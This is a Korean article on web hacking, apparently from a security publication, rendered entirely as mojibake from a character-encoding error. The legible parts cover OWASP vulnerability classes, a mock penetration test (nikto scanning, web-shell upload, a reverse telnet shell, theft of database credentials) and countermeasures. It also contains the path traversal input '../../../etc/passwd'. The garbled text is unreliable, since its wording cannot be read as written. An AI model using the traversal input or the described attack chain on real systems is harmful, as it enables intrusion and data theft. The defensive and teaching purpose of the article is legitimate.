»ðÀÔ Ãë¾àÁ¡(A6)¿¡ ÇØ´çÇÏ´Â °ø°Ý ¹æ¹ý¿¡´Â Å©°Ô SQL »ðÀÔ °ø°Ý, ¼Ò½ºÄÚµå »ðÀÔ °ø°ÝÀÌ ÀÖ´Ù. ÀϹÝÀûÀ¸·Î ȨÆäÀÌÁö´Â »ç¿ëÀÚ ÀÎÁõÀ» À§ÇØ ·Î±×ÀÎ ºÎºÐÀ̳ª »õ·Î¿î »ç¿ëÀÚ¸¦ µî·ÏÇÏ´Â ºÎºÐ, °Ô½ÃÆÇÀ̳ª ÀÚ·á½Ç ³»¿ëÀ» º¸¿©ÁÖ´Â ºÎºÐ µî ¸¹ÀÌ ºÎºÐÀÌ µ¥ÀÌÅͺ£À̽º¿Í ¿¬µ¿µÅ Àִµ¥, ÇÊÀÚ°¡ ¸ðÀÇÇØÅ·À» Çß´ø ¸¹Àº »çÀÌÆ®µéµµ ÀÌó·³ À¥°ú µ¥ÀÌÅͺ£À̽º°¡ ¿¬µ¿µÈ ºÎºÐ¿¡¼­ »ç¿ëÀÚ ÀÔ·Â °ªÀ» ÀûÀýÇÏ°Ô Á¦¾îÇÏÁö ¾Ê¾Æ µ¥ÀÌÅͺ£À̽º ³»¿ëÀ» ¿­¶÷Çϰųª ½ÉÁö¾î ½Ã½ºÅÛ ±ÇÇѱîÁö ȹµæÇÒ ¼ö ÀÖ´Â °æ¿ì°¡ ÀÖ¾ú´Ù.

ºÎÀûÀýÇÑ ¿¡·¯ ó¸®(A7)´Â °ø°ÝÀÚ°¡ ÀÓÀÇ·Î À¥ ¾ÖÇø®ÄÉÀ̼ǿ¡ ¿¡·¯°¡ ¹ß»ýÇϵµ·Ï ƯÁ¤ÇÑ µ¿ÀÛÀ» ÇØ À¥ ¾ÖÇø®ÄÉÀ̼ÇÀÌ Á¤»óÀûÀ¸·Î ó¸®ÇÏÁö ¸øÇÏ°í ¿¡·¯¸¦ ¹ß»ýÇϸ鼭 ´Ù¾çÇÑ Á¤º¸¸¦ ³ëÃâÇϵµ·Ï À¯µµÇÏ´Â Ãë¾àÁ¡ÀÌ´Ù. ÇÊÀÚ°¡ ÀÚÁÖ »ç¿ëÇÏ´Â ¹æ¹ý Áß¿¡¼­ ƯÁ¤ URL º¯¼ö¿¡ ƯÁ¤ ¹®ÀÚ¸¦ ÀÔ·ÂÇϰųª Ãß°¡ÇßÀ» ¶§ À¥ ¾ÖÇø®ÄÉÀ̼ÇÀÌ À̸¦ Á¤»óÀûÀ¸·Î ó¸®ÇÏÁö ¸øÇØ ¿¡·¯°¡ ¹ß»ýÇϵµ·Ï ÇÏ´Â ±â¹ýÀÌ ÀÖ´Ù. º¸Åë Àڹ٠󸮸¦ ÇÒ ¶§ Null Point Error³ª MS SQL ¿¡·¯, ¿À¶óŬ ¿¡·¯, ÅèÄÏ ¿¡·¯ µîÀ» ÅëÇØ À¥ ¾ÖÇø®ÄÉÀ̼ǿ¡ ´ëÇÑ Á¤º¸¸¦ ¼öÁýÇÑ´Ù.

Ãë¾àÇÑ Á¤º¸ ÀúÀå ¹æ½Ä(A8) Ãë¾àÁ¡Àº ´ëÇ¥ÀûÀ¸·Î À¥¿¡¼­ µ¥ÀÌÅͺ£À̽º¿Í ¿¬µ¿µÇ´Â ¼Ò½ºÄڵ尡 ±×´ë·Î ³ëÃâµÇ´Â °æ¿ì´Ù. ¿¹ÀüºÎÅÍ ³í¶õÀÌ µÇ´ø °ÍÀ¸·Î µ¥ÀÌÅͺ£À̽º¿Í ¿¬µ¿ÇÏ´Â ÆÄÀÏÀÎ dbconn.inc¿Í °°Àº ÆÄÀÏÀÌ À¥ ¼­¹ö µð·ºÅ丮¿¡ ÀÖ´Ù¸é °ø°ÝÀÚ´Â dbconn.inc ÆÄÀÏÀ» ±×´ë·Î À¥¿¡¼­ ¿­¶÷ÇØ µ¥ÀÌÅͺ£À̽º¿¡ Á¢±ÙÇÏ´Â Á¤º¸¸¦ ȹµæÇÑ´Ù. ¶ÇÇÑ ¾Ïȣȭ ¾Ë°í¸®ÁòÀ» »ç¿ëÇÏ´Â °æ¿ì¿¡µµ ¾Ïȣȭ¿¡ »ç¿ëµÇ´Â Å°³ª, ºñ¹Ð¹øÈ£, ÀÎÁõ¼­ µîÀ» °ø°ÝÀÚ°¡ ÃßÃâÇϱ⠽¬¿î °÷¿¡ º¸°üÇÏ¸é °ø°ÝÀÚ°¡ ¾î·ÆÁö ¾Ê°Ô Áß¿äÇÑ Á¤º¸¿¡ Á¢±ÙÇÒ ¼ö ÀÖ´Ù.

½ÇÁ¦ ¸ðÀÇÇØÅ·À» Çغ¸¸é ÀÌ¿Í °°Àº Ãë¾àÁ¡Àº ¾Õ¼­ ¼³¸íÇÑ SQL ÀÎÁ§¼ÇÀ̳ª ÆÄÀÏ ¾÷·Îµå Ãë¾àÁ¡µéº¸´Ù ¹ß°ßµÇ´Â ºóµµ°¡ ³·´Ù. ±×·¯³ª ¾ó¸¶ Àü ¸ðÀÇÇØÅ·À» Çϸ鼭 ³»ºÎ ½Ã½ºÅÛ¿¡ Á¢±ÙÇßÀ» ¶§´Â µ¥ÀÌÅͺ£À̽º¿Í ¿¬µ¿ÇÏ´Â Äڵ尡 ÀÚü ¾Ïȣȭ ¾Ë°í¸®ÁòÀ» ÀÌ¿ëÇØ Á¢¼Ó Á¤º¸¸¦ ¾ÏȣȭÇØ º¸°üÇÏ°í ÀÖ¾ú´Ù. ±×·¯³ª ½ÇÁ¦ ´Ù¸¥ ¼Ò½ºÄÚµå ³»¿¡ ¾Ïȣȭ ¾Ë°í¸®ÁòÀ» º¹È£È­ÇÏ´Â Á¤º¸°¡ Á¸ÀçÇØ ÀÖ¾î ÇÊÀÚ´Â ±× ¼Ò½ºÄڵ带 ¹ÙÅÁÀ¸·Î ¾î·ÆÁö ¾Ê°Ô º¹È£È­ÇØ µ¥ÀÌÅͺ£À̽º Á¢±Ù Á¤º¸¸¦ ¼öÁý, Áß¿ä µ¥ÀÌÅͺ£À̽º¿¡ Á¢±ÙÇÒ ¼ö ÀÖ¾ú´Ù.

°ø°ÝÀÚ°¡ ¼­ºñ½º ¹æÇØ °ø°Ý(DoS)(A9)À» ÀÌ¿ëÇÏ¸é »ç¿ëÀÚÀÇ °èÁ¤À» Àá±×°Å³ª À¥ ¼­ºñ½º¸¦ ÇÏÁö ¸øÇÏ°Ô ÇÒ ¼ö ÀÖ´Ù. ´ÜÀûÀÎ ¿¹°¡ ¾ó¸¶Àü ÀϺ»ÀÇ ±³°ú¼­ ¿Ö°î »ç°ÇÀÌ ¹ß»ýÇßÀ» ¶§ ¿ì¸®³ª¶ó ³×ƼÁðµéÀÌ Æ¯Á¤ »çÀÌÆ®¸¦ ¹æ¹®ÇØ <F5>¸¦ ´­·¯ ¾öû³­ Æ®·¡ÇÈÀ» À¯¹ß½ÃÄÑ ´Ù¸¥ »ç¿ëÀÚµéÀÌ ±× »çÀÌÆ®¿¡ Á¢¼ÓÇÏÁö ¸øÇϵµ·Ï ÇÑ »ç°ÇÀÌ´Ù.

¸ðÀÇÇØÅ·À» ÇÒ ¶§¿¡´Â ÀϹÝÀûÀ¸·Î DoS¸¦ ½ÃµµÇÏÁö ¾Ê´Â´Ù. DoS¸¦ ¸·À» ¹æ¾Èµµ ¸¶¶¥È÷ ¾øÀ»»Ó¸¸ ¾Æ´Ï¶ó ½ÇÁ¦ ħÀÔÀÇ °üÁ¡¿¡¼­ º¸¸é DoS´Â ±â¼úÀûÀ¸·Î ±×¸® ½É°¢ÇÑ À§ÇùÀÌ ¾Æ´Ï´Ù. ±×·¯³ª Áö³­ 2001³â ÃÊ ¾ßÈijª À̺£ÀÌ°¡ DoS¸¦ ´çÇØ ±ÝÀüÀûÀ¸·Î ¼öõ¾ï ¿øÀÇ ÇÇÇظ¦ ÀÔÀº ÀûÀÌ ÀÖ´Ù.

ºÎÀûÀýÇÑ È¯°æ ¼³Á¤(A10)¿¡ ÇØ´çÇÏ´Â Ãë¾àÁ¡Àº µð·ºÅ丮 ¸®½ºÆÃ, µð·ºÅ丮 Ž»ö µîÀÌ ÀÖ´Ù. µð·ºÅ丮 ¸®½ºÆà Ãë¾àÁ¡Àº ½ÇÁ¦ ¸ðÀÇÇØÅ·¿¡¼­ ¸¹ÀÌ º¼ ¼ö ÀÖÀ¸¸ç µð·ºÅ丮 Ž»ö Ãë¾àÁ¡(±¹³»¿¡¼± ÈçÈ÷ ÆÄÀÏ ´Ù¿î·Îµå Ãë¾àÁ¡À̶ó°í ºÎ¸¥´Ù) ¿ª½Ã ½Ã½ºÅÛÀÇ Áß¿äÇÑ ÆÄÀÏÀ» °¡Á®¿À´Âµ¥ ÀÚÁÖ »ç¿ëµÈ´Ù. ÀϹÝÀûÀ¸·Î ÀÚ·á½Ç¿¡¼­ ÆÄÀÏÀ» ´Ù¿î·ÎµåÇÒ ¶§ ÆÄÀÏ¸í¿¡ ¡®../../../etc/passwd¡¯¿Í °°ÀÌ ÀÔ·ÂÇØ »óÀ§ µð·ºÅ丮·Î À̵¿ÇÑ ÈÄ Æ¯Á¤ Áß¿ä ÆÄÀÏÀ» °¡Á®¿À´Â ¹æ½ÄÀ¸·Î ¾Ç¿ëµÈ´Ù.

½ÇÀü À¥ ÇØÅ· µ¥¸ð

ÀÌÁ¦ ½ÇÁ¦ À¥ ÇØÅ· °úÁ¤°ú ±× ´ëÀÀ¹æ¾ÈÀ» »ìÆ캸µµ·Ï ÇÏÀÚ. ÇØÅ·ÀÇ 1Â÷ÀûÀÎ °úÁ¤Àº <±×¸² 1>ó·³ ´ë»ó¿¡ ´ëÇÑ Á¤º¸¸¦ ¼öÁýÇÏ´Â °ÍÀÌ´Ù. ´ë»ó ½Ã½ºÅÛ¿¡ ´ëÇÑ À¥ ½ºÄµ, Æ÷Æ® ½ºÄµ, ¶Ç´Â ¾ÖÇø®ÄÉÀ̼ÇÀÇ Á¾·ù³ª ¿î¿µÃ¼Á¦ÀÇ Á¾·ù, ¹öÀü µîÀ» È®ÀÎÇÏ´Â °ÍÀÌ´Ù. ÀÌ·± Á¤º¸¸¦ ¹ÙÅÁÀ¸·Î ´ë»ó ½Ã½ºÅÛÀÇ Ãë¾àÁ¡ ºÐ¼®¿¡ µé¾î°£´Ù. ¿î¿µÃ¼Á¦ÀÇ Á¾·ù³ª ¹öÀü¿¡ µû¶ó¼­ Á¸ÀçÇÏ´Â Ãë¾àÁ¡À» Á¶»çÇÏ°í À¥ ¼­¹ö¿¡ ¿Ã¶ó¿Í ÀÖ´Â ¾ÖÇø®ÄÉÀ̼ǿ¡ ´ëÇÑ Ãë¾àÁ¡, À¥ÀÇ ±¸Á¶¸¦ ÆľÇÇØ ½ÇÁ¦ ¾î¶² Ãë¾àÁ¡ÀÌ ÀÖ´ÂÁö¸¦ ã´Â´Ù.

Á¶»ç¸¦ ¸¶ÃÆÀ¸¸é ÀÌÁ¦ ´ë»ó ½Ã½ºÅÛ¿¡ Á¸ÀçÇÏ´Â Ãë¾àÁ¡À» ¹ÙÅÁÀ¸·Î ½ÇÁ¦ °ø°Ý¿¡ µé¾î°£´Ù. Å©°Ô ¿ø°Ý¿¡¼­ °ø°ÝÇÏ´Â ¸®¸ðÆ® ¾îÅðú ·ÎÄÿ¡¼­ ±ÇÇÑÀ» ȹµæÇÏ´Â ·ÎÄà ¾îÅÃÀÌ ÀÖ´Ù. À̸¦ ÅëÇØ °ø°ÝÀÚ°¡ ¿øÇÏ´Â ¸ñÀû(½Ã½ºÅÛ °ü¸®ÀÚ ±ÇÇÑ È¹µæ ¶Ç´Â »ç¿ëÀÚ Á¤º¸ ÃßÃâ)À» ´Þ¼ºÇÑ´Ù. ¸¶Áö¸·À¸·Î »çÈÄ Ã³¸®¸¦ ÇÏ´Â µ¥ ¾ÇÀÇÀûÀÎ °ø°ÝÀÚ¶ó¸é ħÅõÇÑ ·Î±×¸¦ »èÁ¦ÇÑ ÈÄ ³×Æ®¿öÅ© Æ®·¡ÇÈÀ» °¨½ÃÇÏ°í ºÐ¼®ÇÏ´Â ÇÁ·Î±×·¥ÀÎ ½º´ÏÆÛ¸¦ ¼³Ä¡ÇÑ´Ù. º¸¾È ÄÁ¼³Æà °úÁ¤ Áß ¸ðÀÇÇØÅ· ¼öÇà ½Ã¿¡´Â º¸°í¼­¸¦ ÀÛ¼ºÇØ ´ã´çÀÚ¿¡°Ô Àü´ÞÇØ Ãë¾àÁ¡À» ÆÐÄ¡ÇÏ°í º¸¾È ´ëÃ¥À» ¼öÇàÇϵµ·Ï Á¶¾ðÇÑ´Ù.

Á¤º¸ ¼öÁý

°ø°ÝÇÒ ´ë»óÀ» ¼±Á¤ÇÏ°í ´ë»ó¿¡ ´ëÇÑ ´Ù¾çÇÑ Á¤º¸¸¦ ¼öÁýÇß´Ù°í Çؼ­ ¹Ù·Î °ø°Ý¿¡ µé¾î°¡´Â °ÍÀº ¾Æ´Ï´Ù. ´ë±â¾÷À̳ª ±ÝÀ¶±Ç µî Å« ±â¾÷µéÀº º¸Åë ¹æÈ­º®À̳ª IDS¸¦ ¿î¿µÇÏ°í ÀÖÀ¸¹Ç·Î À¥ ½ºÄµÀ̳ª Æ÷Æ®½ºÄµ °ø°ÝÀº °ð¹Ù·Î ŽÁö, ·Î±ëµÈ´Ù. ±×·¯³ª Áß¼Ò ¼îÇθô°ú °°Àº ºñ±³Àû ÀÛÀº »çÀÌÆ®´Â ¹æÈ­º®À̳ª IDS°¡ ¾ø´Â °æ¿ì°¡ ¸¹´Ù. ¿©±â¼­´Â ÀϹÝÀûÀ¸·Î »ç¿ëÇÏ´Â À¥ ½ºÄ³´×À» ÅëÇØ À¥ ¼­¹ö¿¡ Á¸ÀçÇÏ´Â Ãë¾àÁ¡À» ã´Â °úÁ¤À» º¸¿©ÁØ´Ù. À¥ ½ºÄ³³Ê´Â ÇÁ¸®¿þ¾îºÎÅÍ »ó¿ë ÇÁ·Î±×·¥±îÁö ´Ù¾çÇÏÁö¸¸ º¸Åë ÇØÄ¿µéÀº nikto¶ó´Â ÇÁ·Î±×·¥À» ÀÚÁÖ »ç¿ëÇÑ´Ù.

À¥ ½ºÄ³´×ÀÇ ¿ø¸®´Â <±×¸² 2>¿Í °°´Ù. ´ë»ó ½Ã½ºÅÛ¿¡ HTTP ¿äûÀ» ÇÏ¸é ´ë»ó ½Ã½ºÅÛÀº ¿äû¿¡ ´ëÇÑ ÀÀ´äÀ» º¸³½´Ù. °ø°ÝÀÚ´Â ÀÀ´ä¿¡ ´ëÇÑ ¸®ÅÏ Äڵ带 ¹ÙÅÁÀ¸·Î ÆäÀÌÁö°¡ Á¸ÀçÇÏ´ÂÁö, Á¸ÀçÇÏÁö ¾Ê´ÂÁö ¶Ç´Â Á¢±Ù Á¦¾î°¡ °É·Á ÀÖ´ÂÁö¸¦ ÆľÇÇÑ´Ù.

<È­¸é 1> ´ë»ó ½Ã½ºÅÛ¿¡ À¥ ½ºÄ³´×À» ÇÏ´Â È­¸é

<È­¸é 2> °ü¸®ÀÚ ·Î±×ÀÎ ÆäÀÌÁö¿¡ Á¢¼ÓÇÑ È­¸é

<±×¸² 1> ÀϹÝÀûÀÎ °ø°Ý ÀýÂ÷

<±×¸² 2> ½ºÄ³´× ¿ø¸® È­¸é

<È­¸é 3> ÆÄÀÏ ¾÷·Îµå °Ô½ÃÆÇ¿¡ °ø°Ý ÇÁ·Î±×·¥À» ¾÷·ÎµåÇÏ´Â È­¸é

<È­¸é 4> °ø°Ý ÇÁ·Î±×·¥ÀÌ Á¤»óÀûÀ¸·Î ¾÷·ÎµåµÈ È­¸é

<È­¸é 5> °ø°Ý ÇÁ·Î±×·¥À» ÀÌ¿ëÇØ ½Ã½ºÅÛ ³»ºÎ ¸í·É¾î¸¦ ½ÇÇàÇÑ È­¸é

<±×¸² 3> ¸®¹ö½º ÅÚ³Ý ±¸¼ºµµ

ºÐ¼®°ú °ø°Ý

À¥ ½ºÄ³´×À» ÅëÇØ À¥ ¼­¹öÀÇ ¹öÀüÀ̳ª Á¤º¸µéÀ» ¼öÁýÇß´Ù¸é ÀÌÁ¦ºÎÅÍ´Â <È­¸é 2>¿Í °°ÀÌ À¥ ºê¶ó¿ìÀú¸¦ ÀÌ¿ëÇØ °ü¸®ÀÚ ÆäÀÌÁö¿¡ Á¢±ÙÀ» ½ÃµµÇÑ´Ù.

ÇÊÀÚ°¡ ¸ðÀÇÇØÅ·Çϸ鼭 º¸¾ÈÀÌ Àß µÇ¾î ÀÖ´Â »çÀÌÆ®´Â °Ô½ÃÆÇÀ̳ª ÀÚ·á½Ç¿¡ ÆÄÀÏÀ» ¾÷·ÎµåÇÒ ¼ö ÀÖ´Â ºÎºÐÀÌ ¾ø°í °ü¸®ÀÚ ÆäÀÌÁö¿¡¼­¸¸ ÆÄÀÏÀ» ¾÷·ÎµåÇÒ ¼ö ÀÖ°Ô µÅ ÀÖ¾ú´Ù. <È­¸é 3>Àº °Ô½ÃÆÇ¿¡ ÀÖ´Â ÆÄÀÏ ¾÷·Îµå ºÎºÐ¿¡ °ø°Ý ÇÁ·Î±×·¥À» ¾÷·ÎµåÇÑ È­¸éÀÌ´Ù. ¾÷·Îµå ÆÄÀÏ¿¡ ´ëÇÑ È®ÀåÀÚ Á¦ÇÑ µî Ưº°ÇÑ °ü¸® Á¤Ã¥ÀÌ ¾ø´Ù¸é <È­¸ç 4>¿Í °°ÀÌ Ã·ºÎµÈ ÆÄÀÏÀÌ À¥ ¼­¹ö¿¡ Á¤»óÀûÀ¸·Î µî·ÏµÈ´Ù. <È­¸é 5>´Â ¾÷·ÎµåÇÑ ÆÄÀÏÀ» À¥¿¡¼­ ½ÇÇàÇÑ °á°úÀÌ´Ù. À¥¿¡¼­ ipconfig ¸í·É¾î¸¦ ÀÔ·ÂÇÏ¸é ½Ã½ºÅÛ ¸í·É¾î °á°ú°¡ ³ªÅ¸³ª´Â °ÍÀ» È®ÀÎÇÒ ¼ö ÀÖ´Ù.

ÈçÈ÷ °ø°ÝÀÚ´Â ´õ Æí¸®ÇÏ°Ô ÀÛ¾÷Çϱâ À§ÇØ <±×¸² 3>°ú °°ÀÌ ¸®¹ö½º ÅÚ³ÝÀ̶ó´Â ±â¹ýÀ» ÅëÇØ ´ë»ó ½Ã½ºÅÛÀÇ Ä¿¸Çµå ¼ÐÀ» °ø°ÝÀÚ¿¡°Ô ¶ç¿î´Ù. ¸®¹ö½º ÅÚ³ÝÀ̶õ ÀϹÝÀûÀÎ ÅÚ³ÝÀÇ ¹Ý´ë¸»·Î, ¹æÈ­º® ¶§¹®¿¡ ÅÚ³Ý Á¢¼ÓÀÌ ºÒ°¡´ÉÇÑ °æ¿ì ¿ªÀ¸·Î À¥ ¼­¹ö¿¡¼­ °ø°ÝÀÚ ÄÄÇ»ÅͷΠƯÁ¤ Æ÷Æ®¸¦ ÀÌ¿ëÇØ ¿¬°áÀ» ½ÃµµÇÏ´Â °ÍÀÌ´Ù. ÀϹÝÀûÀ¸·Î ¹æÈ­º®Àº Àιٿîµå(Inbound)¿¡ ´ëÇØ ¸ðµÎ ¸·´Â Á¤Ã¥À» ÃëÇÏÁö¸¸ ³»ºÎ¿¡¼­ ¿ÜºÎ·Î ³ª°¡´Â °ÍÀº Çã¿ëÇϱ⠶§¹®ÀÌ´Ù. ÇÊÀÚ ¿ª½Ã ¼ö½Ê ±ºµ¥ »çÀÌÆ®¸¦ ¸ðÀÇÇØÅ·Çϸ鼭 ¾Æ¿ô¹Ù¿îµå(Outbound)±îÁö Á¦¾î°¡ µÈ °÷Àº ÇÑ µÎ ±ºµ¥ Á¤µµ¿´´Ù.

<È­¸é 6>Àº ¸®¹ö½º ÅÚ³ÝÀ» ÀÌ¿ëÇØ °ø°ÝÀÚ°¡ ´ë»ó ½Ã½ºÅÛÀÇ Ä¿¸Çµå ¼ÐÀ» ȹµæÇÑ È­¸éÀÌ´Ù. °ø°ÝÀÚ ÄÄÇ»ÅÍÀÇ IP ÁÖ¼Ò´Â 10.10.10.86Àε¥ ¸®¹ö½º Åڳݿ¡ ¼º°øÇÑ ÈÄ °ø°ÝÀÚ Ä¿¸Çµå ¼Ð¿¡´Â ÇÇÇØ ÄÄÇ»ÅÍÀÇ IP ÁÖ¼ÒÀÎ 192.168.2.10°¡ ³ªÅ¸³ª´Â °ÍÀ» ¾Ë ¼ö ÀÖ´Ù. <È­¸é 7>Àº ÀÌ·¸°Ô Á¢¼ÓÇÑ ÀÌÈÄ µ¥ÀÌÅͺ£À̽º¿¡ ´ëÇÑ Á¤º¸ ÆÄÀÏÀ» ¿­¶÷ÇÑ È­¸éÀÌ´Ù. DB À̸§°ú »ç¿ëÀÚ À̸§ ±×¸®°í Á¢¼Ó Æнº¿öµå¿Í ÁÖ¼Ò¸¦ °í½º¶õÈ÷ È®ÀÎÇÒ ¼ö ÀÖ´Ù. <È­¸é 8>Àº ÃßÃâÇÑ DB Á¢¼Ó Á¤º¸¸¦ ¹ÙÅÁÀ¸·Î MS SQL DB¿¡ Á¢¼ÓÇÑ È­¸éÀÌ´Ù. º¸¾ÈÀÌ Ãë¾àÇÑ »çÀÌÆ®¶ó¸é °ø°ÝÀÚ´Â ÀÌó·³ °£´ÜÇÏ°Ô DB ³»¿ëÀ» ¿­¶÷ÇÒ ¼ö ÀÖ´Ù.

½ÇÁ¦ ¸ðÀÇ ÇØÅ· ½Ã¿¡´Â DB ¼­¹ö°¡ ³»ºÎ ³×Æ®¿öÅ©¿¡ Á¸ÀçÇÏ´Â °æ¿ì°¡ ¸¹´Ù. ±×·¡¼­ MS SQLÀÇ Äõ¸® ºÐ¼®±â¸¦ ÀÌ¿ëÇØ DB ¼­¹ö°¡ »ç¿ëÇÏ´Â 1433 Æ÷Æ®·Î Á¢±ÙÇÒ ¼ö ¾ø´Ù. º¸Åë ¹æÈ­º®¿¡¼­ 1433 Æ÷Æ®¿Í °°Àº ¿ÜºÎ¿¡¼­ Á¢¼ÓÇÒ ÇÊ¿ä°¡ ¾ø´Â Æ÷Æ®´Â ¸·¾ÆµÎ±â ¶§¹®ÀÌ´Ù. ±×·¡¼­ ÇÊÀÚ´Â º¸Åë À¥¿¡¼­ DB¿Í ¿¬µ¿ÇÏ´Â ¼Ò½ºÄڵ带 ºÐ¼®ÇØ DB Á¢¼Ó Äڵ带 ¸¸µé°í À̸¦ À¥À¸·Î ½ÇÇàÇØ ±× °á°ú¸¦ º¸°ï ÇÑ´Ù.

À¥ ÇØÅ· ´ëÀÀ¹æ¾È

±×·¸´Ù¸é ÀÌ·± ÇØÅ·ÀÇ À§Çù¿¡ ¾î¶»°Ô ´ëÀÀÇØ¾ß ÇÒ±î. ¸ÕÀú ¾Õ¼­ »ìÆ캻 ÆÄÀÏ ¾÷·Îµå Ãë¾àÁ¡¿¡ ´ëÇÑ ´ëÀÀ¹æ¾ÈÀ» ¾Ë¾Æº¸ÀÚ. ÀÌ Ãë¾àÁ¡Àº °ø°ÝÀÚ°¡ À¥ »çÀÌÆ®¿¡ ÀÖ´Â °Ô½ÃÆÇÀ̳ª ÀÚ·á½ÇÀÇ ÆÄÀÏ ¾÷·Îµå ±â´ÉÀ» ÀÌ¿ëÇØ °ø°ÝÀÚ°¡ ¸¸µç ƯÁ¤ °ø°Ý ÇÁ·Î±×·¥À» ¾÷·ÎµåÇØ À¥ ¼­¹öÀÇ ±ÇÇÑÀ» ȹµæÇÏ´Â ¹æ¹ýÀÌ´Ù. °ø°Ý¿¡ ¼º°øÇϸé À¥ ¼­¹ö ±ÇÇÑÀ» ȹµæÇϸç ÀÌ¹Ì »ìÆ캻 °Íó·³ À¥ ¼­¹ö ±ÇÇÑÀ¸·Î ½Ã½ºÅÛ ³»ºÎ ¸í·É¾î¸¦ ½ÇÇàÇÒ ¼ö ÀÖ´Ù.

À̸¦ ¸·±â À§Çؼ­´Â °Ô½ÃÆÇÀ̳ª ÀÚ·á½Ç°ú °°ÀÌ ÆÄÀÏ ¾÷·Îµå ±â´É¿¡´Â ¹Ýµå½Ã ÆÄÀÏÀÇ È®ÀåÀÚ¸¦ ÇÊÅ͸µÇØ¾ß ÇÑ´Ù. ÇÊÅ͸µÇÏ´Â È®ÀåÀÚ´Â ´ë¼Ò¹®ÀÚÀÇ Á¶ÇÕÀÇ °æ¿ì(.jsp¿Í .jSp¿Í °°ÀÌ)¸¦ ¸ðµÎ Æ÷ÇÔ½ÃÄÑ¾ß Çϸç, ÇÊÅ͸µ Äڵ带 ÀÚ¹Ù½ºÅ©¸³Æ®¿Í °°ÀÌ Å¬¶óÀ̾ðÆ® »çÀÌµå ½ºÅ©¸³Æ® ¾ð¾î¿¡¼­ Àû¿ëÇÏ¸é °ø°ÝÀÚ°¡ ¿ìȸÇÒ ¼ö ÀÖÀ¸¹Ç·Î ¹Ýµå½Ã ¼­¹ö »çÀÌµå ½ºÅ©¸³Æ® ¾ð¾îÀÎ ASP³ª JSP¿¡¼­ ÇÊÅ͸µ Äڵ带 Ãß°¡ÇØ¾ß ÇÑ´Ù. À̹ۿ¡µµ À¥ ÇØÅ·¿¡ ½ÇÁ¦ À¥ ÇØÅ·¿¡ »ç¿ëµÇ´Â Ãë¾àÁ¡Àº ´Ù¾çÇÏ´Ù. ÀϹÝÀûÀ¸·Î ÀϾ´Â À¥ Ãë¾àÁ¡¿¡ ´ëÇÑ ´ëÀÀ¹æ¹ýÀ» »ìÆ캸ÀÚ.

SQL ÀÎÁ§¼Ç Ãë¾àÁ¡

SQL ÀÎÁ§¼ÇÀ̶õ À¥ »ó¿¡¼­ »ç¿ëÀÚÀÇ ÀÔ·ÂÀ» ¹Þ´Â ºÎºÐ¿¡ SQL ±¸¹®À» »ðÀÔÇØ DB ³»¿ëÀ» ¿­¶÷Çϰųª DB¿Í °ü·ÃµÈ ¸í·É¾î¸¦ ½ÇÇàÇÒ ¼ö ÀÖ´Â Ãë¾àÁ¡ÀÌ´Ù. º¸Åë »ç¿ëÀÚ ·Î±×ÀÎ ºÎºÐÀ̳ª, °Ë»ö ºÎºÐ, ¿ìÆí¹øÈ£ ã±â µî À¥ ¼­¹ö¿Í DB ¼­¹ö °£¿¡ ¿¬µ¿ÀÌ µÇ´Â ºÎºÐ¿¡ »ç¿ëÀÚ ÀÔ·Â °ª¿¡ ´ëÇÑ ÇÊÅ͸µÀÌ ¾øÀ» °æ¿ì SQL ÀÎÁ§¼Ç °ø°Ý¿¡ ³ëÃâµÉ À§ÇèÀÌ ³ô´Ù. »ç¿ëÀÚ ·Î±×ÀÎÀ» ¿ìȸÇØ ·Î±×ÀÎÇÑ ÈÄ µ¥ÀÌÅͺ£À̽º ³»¿¡ ÀÖ´Â Å×ÀÌºí ³»¿ëÀ» ¿­¶÷Çϰųª, MS SQL¿¡¼­´Â È®Àå ÇÁ·Î½ÃÀú¸¦ ÀÌ¿ëÇØ ½Ã½ºÅÛ ¸í·É¾î¸¦ ½ÇÇàÇÒ ¼ö ÀÖ´Ù.

SQL ÀÎÁ§¼Ç Ãë¾àÁ¡¿¡ ´ëÇÑ °¡Àå ±Ùº»ÀûÀÎ ´ëÃ¥Àº »ç¿ëÀÚ ÀԷ¿¡ ´ëÇؼ­ À¯È¿¼ºÀ» °Ë»çÇÏ´Â °ÍÀÌ´Ù. ¿¹¸¦ µé¾î DB¿Í ¿¬µ¿µÇ´Â ºÎºÐÀÎ ·Î±×ÀÎÀ̳ª ¿ìÆí¹øÈ£ °Ë»ö, °Ô½ÃÆÇ µî¿¡´Â ÀÛÀº µû¿ÈÇ¥³ª ´ë½Ã(-), Å« µû¿ÈÇ¥, ¼¼¹ÌÄݷаú °°ÀÌ SQL ±¸¹®¿¡ »ç¿ëµÇ´Â ¹®ÀÚ¿­Àº ÀÔ·ÂÇÏÁö ¸øÇÏ°Ô ÇØ¾ß ÇÑ´Ù. ÀÌ¹Ì ¾ð±ÞÇÑ °Íó·³ ÀÌ·± ÇÊÅ͸µ ±ÔÄ¢Àº ÀÚ¹Ù½ºÅ©¸³Æ®¿Í °°Àº Ŭ¶óÀ̾ðÆ® »çÀÌµå ½ºÅ©¸³Æ® ¾ð¾î·Î ÀÛ¼ºÇÏ¸é ¿ìȸÇÒ ¼ö ÀÖÀ¸¹Ç·Î ¹Ýµå½Ã JSP³ª ASP¿Í °°Àº ¼­¹ö »çÀÌµå ½ºÅ©¸³Æ® ¾ð¾î¿¡¼­ ÇÊÅ͸µÇØ¾ß ÇÑ´Ù.

XSS Ãë¾àÁ¡

XSS Ãë¾àÁ¡Àº À¥ ¼­¹ö¿¡¼­ ƯÁ¤ÇÑ µ¿Àû ÀÔ·ÂÀ» ¹Þ¾Æ À¥ ¼­¹öÀÇ Á¤º¸°¡ °ø°ÝÀÚ¿¡°Ô À¯ÃâµÇ´Â Ãë¾àÁ¡ÀÌ´Ù. ÀϹÝÀûÀ¸·Î °Ô½ÃÆÇÀ̳ª ÀÚ·á½Ç µî »ç¿ëÀÚÀÇ ÀÔ·ÂÀ» ¹Þ´Â ºÎºÐ¿¡ ƯÁ¤ ½ºÅ©¸³Æ® Äڵ带 ÀÔ·ÂÇØ µÎ°í ÀÌ °Ô½Ã¹°À» ´Ù¸¥ »ç¿ëÀÚ°¡ º¼ °æ¿ì »ç¿ëÀÚÀÇ ÄíÅ° Á¤º¸°¡ °ø°ÝÀÚ¿¡°Ô À¯ÃâµÈ´Ù. °ø°ÝÀÚ´Â ÃßÃâÇÑ »ç¿ëÀÚÀÇ ÄíÅ° °ªÀ» ÀÌ¿ëÇØ Reply Attack µîÀ» ÅëÇØ ´Ù¸¥ »ç¿ëÀÚ·Î À§ÀåÇÒ ¼ö ÀÖ´Ù.

